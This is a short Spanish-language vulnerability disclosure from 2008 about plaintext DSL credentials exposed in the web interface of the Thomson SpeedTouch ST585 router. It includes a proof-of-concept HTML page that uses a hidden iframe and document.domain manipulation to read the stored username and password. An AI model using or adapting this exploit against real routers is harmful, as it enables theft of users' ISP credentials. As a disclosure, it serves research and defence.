=[[  THOMSON SPEEDTOUCH ST585 DSL CREDENTIAL DISCLOSURE ]]=

La contreasena DSL se guarda en texto simple y se puede ver en el codigo
fuente de la interfaz de configuracion web del ruteador. Muchos otros datos
como el SSID, direccion MAC y demas configuraciones tambien son accesibles
desde la interfaz web.

Se pueden usar muchas tecnicas para obtener acceso remotamente a estas
paginas y obtener acceso a las propiedases y codigo fuente de las mismas.

En este texto explicaremos PDT Parent Domain Traversal, una tecnica vieja
pero poco conocida.

Las politicas de Same Origin Policy indican que el subdominio X.SERVER.COM
puede accesar a las propiedades y objetos del dominio SERVER.COM

Asi que si apuntamos SERVER.COM a 192.168.1.254 (direccion en LAN del
router) entonces la pagina que tengamos en X.SERVER.COM podra leer cookies
y codigo fuente de SERVER.COM -en este caso el router thomson.

X.SERVER.COM                    -     SERVER.COM
(apuntado a nuestra pagina)     -     (apuntado a IP local del ruteador)
[st585-dsl-poc.html]            -     192.168.1.254


[st585-dsl-poc.html]

<iframe name=iframe1 style="visibility: hidden;" src="http://SERVER.COM/cgi/b/is/_pppoe_/ov/?name=Internet" onload=ea();></iframe>

<script>
document.domain = "SERVER.COM";

function ea(){
var user = this.iframe1.document.getElementsByTagName("input")[5].value;
var pass = this.iframe1.document.getElementsByTagName("input")[6].value;

alert("USER: "+user+"\r\nPASSWD: "+pass);

}

</script>


Proof of Concept Screenshot: http://www.hakim.ws/st585/thomson-remotecfg.jpg



h k m
h a k i m . w s

10 / 9 / 2008



<!- Greets to Emmanuel Goldstein, Jeff Moss, Noam Chomsky, Carl Sagan,
johnny, Aphex Twin http://www.underground.org.mx  -!>


Para mas referencias:
http://taossa.com/index.php/2007/02/08/same-origin-policy/
http://en.wikipedia.org/wiki/Same_origin_policy